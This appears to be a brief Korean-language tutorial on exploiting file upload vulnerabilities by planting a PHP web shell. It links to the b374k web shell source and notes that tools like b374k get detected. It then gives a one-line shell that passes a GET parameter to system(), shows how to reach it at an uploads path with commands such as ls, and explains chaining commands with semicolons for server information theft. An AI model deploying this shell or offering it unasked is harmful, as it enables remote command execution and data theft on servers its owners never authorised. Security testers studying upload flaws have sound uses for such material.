파일업로드 취약점 - 웹쉘

파일 업로드 취약점이 있는 곳이라면 가능.

실무에서는 b 374k 같은거 쓰면 잡혀가므로 한줄짜리로 웹쉘 취약점을 찾아보자.

https://github.com/tennc/webshell/blob/master/php/b374k/source/b374k-2.8.source.php

---

1. 아래 파일을 php로 만들어 놓는다.

<?php
system($_GET['cmd']);
?>

2. php파일을 생성했다면

올린 ip/uploads/a.php 라는 곳으로 접근하고 cmd에 접근 할 것이므로

?cmd = ls

이런식으로 명령어를 써준다

php는 get방식으로 cmd값을 system에 넘겨주고 있어서 명령이 성공적으로 먹힌다.

웹쉘 ok

서버 정보 탈취

명령어를 이으려면 세미콜론; 으로 이어주면 됨